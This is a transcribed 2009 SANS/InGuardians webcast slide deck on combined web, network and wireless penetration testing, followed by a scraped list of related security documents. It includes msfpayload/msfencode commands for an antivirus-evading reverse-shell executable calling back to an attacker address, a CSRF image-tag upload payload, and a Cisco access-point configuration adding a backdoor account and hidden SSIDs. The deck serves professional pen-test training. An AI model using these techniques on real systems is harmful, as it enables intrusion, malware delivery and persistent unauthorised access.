Pen Testing Perfect Storm Part , InGuardians 1
|
|
|
- Eugenia Kristin Hamilton
- 10 years ago
- Views:
Transcription
1 June 1-2, 2009 Paris Hotel Las Vegas, NV How are compliance requirements driving my pen testing strategies and how can I maximize my returns? What skills and techniques do the world s top pen testers use? What worked and what didn t in Penetration Testing at enterprises large and small? What are the industry leading Penetration Testing tools both free and commercial? How can they be implemented most effectively? Your WebCast will start shortly Tool demonstrations from leading vendors Register Now and Receive a 15% Discount! Use discount code PerfectStorm15 Pen Testing Perfect Storm Part , InGuardians 1 Discount also available through June 22, 2009 for the following courses: SEC560, SEC617, and SEC542
2 The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 3 By Kevin Johnson, Ed Skoudis, & Joshua Wright Copyright 2009, All Rights Reserved Version 1Q09 Pen Testing Perfect Storm Part , InGuardians 2
3 Outline Previously in the Trilogy Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 3
4 Previously on 24 To recap, in Parts 1 & 2 of this trilogy, we discussed how pen tests and testers are often categorized: 1) Network tests 2) Web application tests 3) Wireless tests 4) Others, but those are the biggies We also proposed that if you want to be a great pen tester make sure you can pivot between network pen tests, web app tests, and wireless pen tests Furthermore, integrate these attack vectors together into a much more powerful combined attack To procure great pen tests, specify combined tests Pen Testing Perfect Storm Part , InGuardians 4
5 Pen Tester And, We Covered a Scenario Internet Exploit client-side vulnerability in wired XP client WWW 1 Firewall Infrastructure DNS Dump hashes, use Metasploit route command to pivot, and run psexec exploit with pass-the-hash against Vista box get command shell on Vista. 3 4 Install VistaRFMON, NetMon, capture wireless traffic. Bring capture home, analyze and crack. DNS 2 Target Network Wired Windows XP Client with vulnerable browser Identify local preferred wireless networks with saved PSK in profile. Manually connect saved profile. Vista Client WPA2 PSK Lather, rinse, repeat Additional Target Network Firewall Corporate Web Firewall App with PII Run w3af to find 5 Additional command Target Network injection flaw. oscommanding shell provides access to find PII Pen Testing Perfect Storm Part , InGuardians 5 6
6 Today s Focus Let s build on the concept of combined testing We ll discuss useful new tools and techniques In Part 1, the flow was 1) wireless 2) web app 3) network In Part 2, the flow was 1) network 2) wireless 3) web app To illustrate the pragmatic and iterative nature of combined tests, we ll alter the order this time: 1) Web App attack Discovery and exploitation (Ratproxy, Yokoso!) 2) Network exploitation Useful Metasploit features (msfpayload, msfencode, multi-encode options for dodging Anti-Virus) 3) Wireless attack Wireless Geo-location, GeoWig, and Ghost in the AP techniques Pen Testing Perfect Storm Part , InGuardians 6
7 Outline Previously in the Trilogy Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 7
8 Ratproxy: Passive Interception Proxy Ratproxy is a mostly passive scanner Active tests are enable-able! Designed to proxy traffic and scan for flaws Based on the interplay between client and server Focuses on Web 2.0 flaws Includes the ability to decompile and analyze Flash objects Was one of the first tools to find Cross-Site Request Forgery (CSRF) flaws well Ratproxy allows us to combine mapping the application and running a first pass looking for flaws Efficiency is the key! Chaining Ratproxy with other interception proxies that spider the site is one of our tricks CSRF Flaw with various Pen Testing qualifiersperfect Storm Part , InGuardians 8
9 Yokoso! Infrastructure Fingerprinting Originally designed to be an infrastructure fingerprinter Delivered via XSS flaws Contains three parts Lists of interesting URIs JavaScript code to find those URIs in browser history JavaScript code to find those URIs within the target network Attacker Controlled Web Site reporting history to attacker These parts are usable on compromised machines Also come bundled for use within BeEF The project is looking for more help collecting interesting URIs For instructions, please visit Victim browses to XSS site Yokoso! determines interesting sites visited Yokoso! code delivered XSS Injected Web Site Client Browser Pen Testing Perfect Storm Part , InGuardiansWeb Sites
10 Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 10
11 Packaging an Attack with msfpayload Use the msfpayload tool in Metasploit 3.X to turn a payload into an EXE $./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 X The X generates an executable There are other options, including R, for raw We could put the payload on a USB token, send it via , put it on a file share, etc. Or, I don t know maybe deliver it via CSRF? Just wait But, won t an AV tool detect it? Perhaps so let s encode it to evade detection! Pen Testing Perfect Storm Part , InGuardians 11
12 Evading IDS/IPS/AV with msfencode Metasploit supports encoding exploits and payloads In msfconsole, use show encoders and set ENCODER [encoder] Or, you can use msfencode program to encode a raw payload The latest trunk version supports a c [N] option, to apply N rounds of encoding One of the best encoders for evasion is x86/shikata_ga_nai Japanese for nothing can be done about it $./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 R./msfencode e x86/shikata_ga_nai c 4 t exe o payload.exe You need to get Metasploit ready for the inbound connection: msf > use exploit/multi/handler msf > set PAYLOAD windows/shell/reverse_tcp msf > set LHOST [AttackerIPaddr] msf > set LPORT 80 msf > exploit Pen Testing Perfect Storm Part , InGuardians 12
13 Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 13
14 Wireless Geo-Location Question: Where is the client device I have just exploited? IP address information can be misleading (VPN, static, internal networks) iphone pseudo GPS uses nearby Wi-Fi and cellular towers for location analysis Not enough integrated GSM/EV-DO interfaces to use cell tower locations Wi-Fi device location database available with the WIreless Geographic Logging Engine inspired by wardrivers! Pen Testing Perfect Storm Part , InGuardians 14
15 What Networks Are Nearby? Vista and OSX provide command-line tools for network discovery (no love for XP) C:\>netsh wlan show networks mode=bssid find "BSSID" BSSID 1 : 00:1a:53:c1:d3:b6 BSSID 1 : 00:8d:75:ac:6c:fd BSSID 1 : 00:78:6a:f6:b0:b2 BSSID 1 : 00:1c:df:28:ca:98 BSSID 1 : 00:e3:e2:00:a0:5e BSSID 1 : 00:c5:17:34:8b:a3 Vista $ cd /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources $./airport -s SSID BSSID RSSI CHANNEL SECURITY (auth/unicast/group) Belkin_N1_Wireless_A48C93 00:00:f6:38:00:fd NONE 07FX :1a:53:c1:d3:b WEP Nicole 00:1c:df:28:ca: WEP somethingclever 00:78:6a:f6:b0:b WPA(PSK/TKIP/TKIP) OS X rugby 00:c5:17:34:8b:a WPA(PSK/TKIP/TKIP) jrockets 00:8d:75:ac:6c:fd WPA(802.1x/TKIP/TKIP) NETGEAR 00:e3:e2:00:a0:5e NONE Pen Testing Perfect Storm Part , InGuardians 15
16 WiGLE Search Free account required to search by BSSID Pen Testing Perfect Storm Part , InGuardians 16
17 Tool: GeoWig Automates searching WiGLE for BSSIDs Heuristics to identify APs with similar MAC addresses Common in corporate WLAN deployments Available soon: C:\>python geowig.py u josh -p password 00:1a:53:c1:d3:b6 00:8d:75:ac:6c:fd 00:78:6a:f6:b0:b2 00:1c:df:28:ca:98 00:e3:e2:00:a0:5e 00:c5:17:34:8b:a3 GeoWiG Geographic Wireless Guesser. <[email protected]> Please remember to support the WiGLE Project! * Successfully authenticated to wigle.net * Searching for: 00:1a:53:c1:d3:b6 00:8d:75:ac:6c:fd 00:78:6a:f6:b0:b2 00:ba:76:28:ca:98 00:e3:e2:00:a0:5e 00:c5:17:34:8b:a3 Found 5 entries for 6 BSSIDs, calculated lat/lon: Pen Testing Perfect Storm Part , InGuardians 17
18 Ghost in the AP Compromised APs provide tremendous value in a pen-test Leveraged as a network backdoor Configure additional virtual SSIDs Cloaked SSID with authorized (or similar) MAC address (may go unnoticed) Attacker can target any VLAN accessible to compromised AP! Cisco Aironet device as an example, applies to many device manufacturers Pen Testing Perfect Storm Part , InGuardians 18
19 username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods! ssid KJOGuest vlan 156 guest-mode authentication open Before Dubious Configuration username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... username acoop privilege 15 secret "evilpass" aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm encryption vlan 1 ciphers aes-ccm encryption vlan 102 ciphers aes-ccm! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods! ssid KJOGuest vlan 156 guest-mode authentication open!! Backdoor network access SSID on mgmt VLAN ssid attackerbackdoorwlan wpa-psk ascii KevinReallyWearsGlasses vlan 1 no guest-mode!! Attacking any other accessible VLAN example ssid attackvlan102 wpa-psk ascii YouWontGuess vlan 102 Pen Testing Perfect Storm Part , InGuardians 19 no guest-mode Eeek!
20 Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 20
21 Analyze Website with RatProxy Find CSRF Flaw Use Ratproxy to evaluate target website 1 2 Pen Tester Find CSRF flaw that allows upload of files in URI with predictable parameters Internet WWW DNS ESSID=CorpAP Corp AP Target Network Wired Windows Client Firewall Infrastructure Pen Tester s Website Third-party site hosting content Internal Network Server Internal User Pen Testing Perfect Storm Part , InGuardians 21
22 Build AV-Dodging Payload & Place on Load CSRF Trigger 3 Use msfpayload and msfencode to build AVresistant backdoor EXE Rev Shell EXE 4 Pen Tester Place EXE on pen tester s own website Rev Shell EXE Pen Tester s Website Place CSRF activating link on third-party site (e.g., blog) Internet 5 Third-party site hosting content WWW Firewall Infrastructure DNS ESSID=CorpAP Corp AP Internal Network Server Target Network <img src=" name=new%20version& content=http%3a%2f%2ftester.src%2fexecutable.exe"> Internal User Wired Windows Client Pen Testing Perfect Storm Part , InGuardians 22
23 Get Victim to Access CSRF, Making Browser Load Content Pen Tester Rev Shell EXE Pen Tester s Website Website content loading function grabs EXE as new content 8 Internet Third-party site hosting content Rev Shell EXE WWW Firewall Infrastructure <img.> DNS 7 6 Client browser (following the ESSID=CorpAP src of the img tag) invokes function on website to load new content Corp AP Client visits page with content containing Internal <img Network tag> Server reference to CSRF flaw on target s web site Target Network Internal User Wired Windows Client <img.> Pen Testing Perfect Storm Part , InGuardians 23
24 Other Victim Accesses Content, Running Reverse Shell Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content Rev Shell EXE WWW Firewall Infrastructure DNS ESSID=CorpAP Access content newly uploaded to website, downloading EXE and running it Corp AP 9 Internal Network Server Target Network 10 Wired Windows Client Reverse shell connects back to penetration tester Internal User Pen Testing Perfect Storm Part , InGuardians 24
25 Use GeoWig to Verify In-Scope & Use Yokoso! to Admin Devices Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW Firewall Infrastructure DNS ESSID=CorpAP Corp AP Internal Network Server Load and run Yokoso! to find URIs of devices managed from here. 12 Target Network 11 Load and run GeoWig to determine geographic Internal location and User verify scope. Wired Windows Client Pen Testing Perfect Storm Part , InGuardians 25
26 Attack AP and Implement Ghost in the AP Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW Firewall Infrastructure DNS Discover CorpAP and attack it via wired management interface ESSID=CorpAP Corp AP Internal Network Server Target Network Internal User 13 Wired Windows Client Implement Ghost in the AP for backdoor 14 Pen Testing Perfect Storm Part , InGuardians 26
27 Access Target Network from Virtual AP & Attack Servers Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW DNS Attack Firewall internal Infrastructure network ESSID=CorpAP ESSID=GhostAP1 ESSID=GhostAP2 16 Corp AP Internal Network Server 15 Target Network Access target network using new backdoor Ghost AP Internal User Pen Tester Wired Windows Client Pen Testing Perfect Storm Part , InGuardians 27
28 Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 28
29 The Future of Combined Pen Tests More penetration tests moving in this direction Will change budgeting of some tests Combined testing provides a way to differentiate offerings from vuln assessment and compliance checks No-holds barred penetration testing Some organizations are exploring full-contact pen tests where combined methods are the rule, not the exception Even in such tests, carefully spell out the scope and rules of engagement Tools are merging and packaging various techniques together: BeEF, Metasploit, Core, Immunity Pen Testing Perfect Storm Part , InGuardians 29
30 Additional Thoughts on the Future We believe regulations and industry standards will begin to move in this direction Perhaps not immediately, but eventually, in light of high-profile breaches using these techniques Bad guys increasingly do this it s not just hypothetical Pen Testing Perfect Storm Part , InGuardians 30
31 Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part , InGuardians 31
32 Conclusions Combined attack vectors allow for far deeper penetration into most target networks than separate vectors Combining web app, network, and wireless penetration testing is very powerful This combination provides a much more accurate view of the business risks posed by vulnerabilities than offered by completely separate network, wireless, and web app tests Pen Testing Perfect Storm Part , InGuardians 32
33 References Metasploit: Yokoso!: yokoso.inguardians.com Ratproxy: code.google.com/p/ratproxy GeoWig: Pen Testing Perfect Storm Part , InGuardians 33
34 Upcoming In-Depth SANS Pen Test Courses SANS 560: Network Pen Testing and Ethical Hacking Tysons Corner, VA, April 15: Galbraith Register Now Toronto, Canada, May 6: Shewmaker and Receive a Las Vegas, NV, June 3: Skoudis 15% Discount Baltimore, MD, June 15: Strand on these SANS 542: Web App Pen Testing and Ethical Hacking courses offered before June 15! New Orleans, May 5: Johnson Use discount Amsterdam, Netherlands, May 11: Misenar code Baltimore, MD, June 15: Johnson PerfectStorm15 Denver, CO, July 8: Staff SANS 617:Wireless Ethical Hacking, Pen Testing, & Defenses Baltimore, MD, June 15: Wright Denver, CO, July 8: Wright London, England, July 13: Siles Pen Testing Perfect Storm Part , InGuardians 34
35 June 1-2, 2009 Paris Hotel Las Vegas, NV Featuring Top-Notch Presentations from: HD Moore on the future of Metasploit Joshua Wright on evolving wireless attacks Jeremiah Grossman on web app vulnerability assessments Robert rsnake Hansen on web app vulnerabilities Paul Asadoorian on late-breaking pen test techniques Larry Pesce on using document metadata in pen tests Jason Ostrum on VoIP pen testing Ed Skoudis on secrets of pen testing Register Now and Receive a 15% Discount! Use discount code PerfectStorm15 Pen Testing Perfect Storm Part , InGuardians 35
36 Webcast Questions and Answers We ll answer some questions on this webcast We ll also continue the discussion for a week at ethicalhacker.net Post a question in the forum dedicated to this webcast trilogy Josh, Kevin, and Ed will periodically check out questions there and answer Details at temid,54/topic,3807.0/ Or, just surf to and click on the associated article Pen Testing Perfect Storm Part , InGuardians 36
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2
The Test Perfect Storm: Combining Network, Web App, and Wireless Test Techniques Part 2 By Joshua Wright, Kevin Johnson, & Ed Skoudis Copyright 2009, All Rights Reserved Version 1Q09 Testing Perfect Storm
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2
The Test Perfect Storm: Combining Network, Web App, and Wireless Test Techniques Part 2 By Joshua Wright, Kevin Johnson, & Ed Skoudis Copyright 2009, All Rights Reserved Version 1Q09 1 Outline The Power
The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4
The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4 By Ed Skoudis, Kevin Johnson, & Joshua Wright of InGuardians Hosted by Mike Yaffe of Core Copyright 2010, All Rights Reserved Version
How To Hack A Network With A Network Security Attack On A Web Browser (For A Free Download) (For Free) ( For A Free) On A Network) (On A Free Downloaded) (Or For A Paid Download) On An Ip
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part I Kevin Johnson, InGuardians Ed Skoudis, InGuardians Joshua Wright, InGuardians Copyright 2008, All Rights
How We're Getting Creamed
ed Attacks How We're Getting Creamed By Ed Skoudis June 9, 2011 ed Attacks - 2011 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996 working for
The Pen Test Perfect Storm Part 5: We Love Adobe!
The Pen Test Perfect Storm Part 5: We Love Adobe! By Ed Skoudis, Kevin Johnson, & Joshua Wright Hosted by Alex Horan of Core Copyright 2010, All Rights Reserved Version 1.0 1 Outline The Power of Combined
Course Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts)
Course Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts) Course Module: 1. Introduction to Ethical Hacking 2. Footprinting a. SAM Spade b. Nslookup c. Nmap d. Traceroute
How to hack a website with Metasploit
How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security 560.2. Sans Mentor: Daryl Fallin
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing SANS Security 560.2 Sans Mentor: Daryl Fallin http://www.sans.org/info/55868 Copyright 2010, All Rights Reserved Version 4Q10
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
CYBERTRON NETWORK SOLUTIONS
CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities By Ed Skoudis Copyright 2008, SANS Version 2Q08 Network Pen Testing & Ethical Hacking - 2008, Ed Skoudis 1 This Webcast and the
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Exploiting Transparent User Identification Systems
Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
ETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
WHITEPAPER. Nessus Exploit Integration
Nessus Exploit Integration v2 Tenable Network Security has committed to providing context around vulnerabilities, and correlating them to other sources, such as available exploits. We currently pull information
Threat Intelligence Pty Ltd [email protected] 1300 809 437. Specialist Security Training Catalogue
Threat Intelligence Pty Ltd [email protected] 1300 809 437 Specialist Security Training Catalogue Did you know that the faster you detect a security breach, the lesser the impact to the organisation?
Setting up a WiFi Network (WLAN)
Setting up a WiFi Network (WLAN) How to set up Wi-Fi on your Huawei E960 InZone Step 1: In the address field on your internet browser, type http://192.168.1.1/ Step 2: Type admin into the Password box
Configuring Security Solutions
CHAPTER 3 This chapter describes security solutions for wireless LANs. It contains these sections: Cisco Wireless LAN Solution Security, page 3-2 Using WCS to Convert a Cisco Wireless LAN Solution from
Penetration Testing: Lessons from the Field
Penetration Testing: Lessons from the Field CORE SECURITY TECHNOLOGIES SCS SERVICES May 2009 1 Agenda: About me: Alberto Soliño Director of Security Consulting Services at Core Security One of first five
Recommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
Table of Contents. Cisco Wi Fi Protected Access 2 (WPA 2) Configuration Example
Table of Contents Wi Fi Protected Access 2 (WPA 2) Configuration Example...1 Document ID: 67134...1 Introduction...1 Prerequisites...1 Requirements...1 Components Used...2 Conventions...2 Background Information...2
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
Mass Pwnage 4 Dummies. Latest pen-testing tricks using Metasploit
Mass Pwnage 4 Dummies Latest pen-testing tricks using Metasploit What this talk will cover Quick Background Latest Metasploit 3.5 features Automated Attacking even a cave man could do it. Compromising
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison
CEHv8 vs CEHv7 CEHv7 CEHv8 19 Modules 20 Modules 90 Labs 110 Labs 1700 Slides 1770 Slides Updated information as per the latest developments with a proper flow Classroom friendly with diagrammatic representation
Robust security is a requirement for many companies deploying a wireless network. However, creating a secure wireless network has often been
Robust security is a requirement for many companies deploying a wireless network. However, creating a secure wireless network has often been difficult and time-consuming. This paper describes the security
CORE Security and the Payment Card Industry Data Security Standard (PCI DSS)
CORE Security and the Payment Card Industry Data Security Standard (PCI DSS) Addressing the PCI DSS with Predictive Security Intelligence Solutions from CORE Security CORE Security +1 617.399-6980 [email protected]
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
The Pen Test Perfect Storm: We Love Cisco! Pen Test Techniques Part 6
The Pen Test Perfect Storm: We Love Cisco! Pen Test Techniques Part 6 By Joshua Wright, Kevin Johnson, & Ed Skoudis Hosted by Melissa England of Core Copyright 2011, All Rights Reserved 1 Outline The Power
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
McAfee Certified Assessment Specialist Network
McAfee Certified Assessment Specialist Network Exam preparation guide Table of Contents Introduction 3 Becoming McAfee Certified 3 Exam Details 4 Recommended Exam Preparation 4 Exam Objectives 4 Sample
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
June 2014 WMLUG Meeting Kali Linux
June 2014 WMLUG Meeting Kali Linux "the quieter you become, the more you are able to hear" Patrick TenHoopen Kali Linux Kali Linux is a free and open source penetration testing Linux distribution designed
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
NEXPOSE ENTERPRISE METASPLOIT PRO. Effective Vulnerability Management and validation. March 2015
NEXPOSE ENTERPRISE METASPLOIT PRO Effective Vulnerability Management and validation March 2015 KEY SECURITY CHALLENGES Common Challenges Organizations Experience Key Security Challenges Visibility gaps
STEP III: Enable the Wireless Network Card. STEP IV: Print out the Printer Settings pages to determine the IP Address
Title: How do I configure the wireless printer without a network cable and install the printer driver in Windows? NOTE: For successful wireless setup, you MUST know your network security settings. STEP
Overview of the Penetration Test Implementation and Service. Peter Kanters
Penetration Test Service @ ABN AMRO Overview of the Penetration Test Implementation and Service. Peter Kanters ABN AMRO / ISO April 2010 Contents 1. Introduction. 2. The history of Penetration Testing
Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM
COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM Course Description This is the Information Security Training program. The Training provides you Penetration Testing in the various field of cyber world.
Maintaining Access CHAPTER 10 CHAPTER OVERVIEW AND KEY LEARNING POINTS INTRODUCTION INFORMATION IN THIS CHAPTER
CHAPTER 10 Maintaining Access INFORMATION IN THIS CHAPTER Maintaining Access: Terminology and Core Concepts Backdoors Keyloggers CHAPTER OVERVIEW AND KEY LEARNING POINTS This chapter will explain the actions
QualysGuard WAS. Getting Started Guide Version 4.1. April 24, 2015
QualysGuard WAS Getting Started Guide Version 4.1 April 24, 2015 Copyright 2011-2015 by Qualys, Inc. All Rights Reserved. Qualys, the Qualys logo and QualysGuard are registered trademarks of Qualys, Inc.
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification
Secure Web Development Teaching Modules 1 Security Testing Contents 1 Concepts... 1 1.1 Security Practices for Software Verification... 1 1.2 Software Security Testing... 2 2 Labs Objectives... 2 3 Lab
Penetration Testing Walkthrough
Penetration Testing Walkthrough Table of Contents Penetration Testing Walkthrough... 3 Practical Walkthrough of Phases 2-5... 4 Chose Tool BackTrack (Armitage)... 5 Choose Target... 6 Phase 2 - Basic Scan...
Developing Network Security Strategies
NETE-4635 Computer Network Analysis and Design Developing Network Security Strategies NETE4635 - Computer Network Analysis and Design Slide 1 Network Security Design The 12 Step Program 1. Identify network
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Security Awareness. Wireless Network Security
Security Awareness Wireless Network Security Attacks on Wireless Networks Three-step process Discovering the wireless network Connecting to the network Launching assaults Security Awareness, 3 rd Edition
Kautilya: Teensy beyond shells
Kautilya: Teensy beyond shells Kautilya Toolkit for Teensy device Nikhil Mittal 1 P a g e Contents Kautilya Toolkit for Teensy device... 1 Nikhil Mittal... 1 Abstract... 3 Attack Surface and Scenarios...
Using Nessus In Web Application Vulnerability Assessments
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security [email protected] About Tenable Nessus vulnerability scanner, ProfessionalFeed
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
Appalachian Regional Commission Evaluation Report. Table of Contents. Results of Evaluation... 1. Areas for Improvement... 2
Report No. 13-35 September 27, 2013 Appalachian Regional Commission Table of Contents Results of Evaluation... 1 Areas for Improvement... 2 Area for Improvement 1: The agency should implement ongoing scanning
Web attacks and security: SQL injection and cross-site scripting (XSS)
Web attacks and security: SQL injection and cross-site scripting (XSS) License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
THE OPEN UNIVERSITY OF TANZANIA
THE OPEN UNIVERSITY OF TANZANIA Institute of Educational and Management Technologies COURSE OUTLINES FOR DIPLOMA IN COMPUTER SCIENCE 2 nd YEAR (NTA LEVEL 6) SEMESTER I 06101: Advanced Website Design Gather
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
